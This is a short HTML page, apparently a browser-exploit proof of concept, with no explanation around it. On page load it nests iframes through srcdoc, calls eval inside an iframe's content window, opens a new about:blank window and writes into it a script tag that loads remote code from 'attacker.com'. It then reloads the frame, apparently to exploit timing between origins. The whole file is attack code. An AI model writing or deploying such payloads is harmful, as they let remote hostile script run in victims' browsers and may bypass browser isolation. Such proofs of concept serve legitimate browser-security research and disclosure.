<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGWhJEFGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGWhJEFGGGGG.addEventListener("load",()=>{GGGGGWhJEFGGGGG.srcdoc="<iframe id=GGGGWhJEFGGGG src=about:blank><\/iframe><script>GGGGWhJEFGGGG.onload=_=>GGGGWhJEFGGGG.contentWindow.eval('w=window.open(`about:blank`); w.document.write(`<script src=https://attacker.com/static/static.js><\\/script>`);');GGGGWhJEFGGGG.contentWindow.location.reload();<\/script>";},{once:true});
};
</script>
</body>
</html>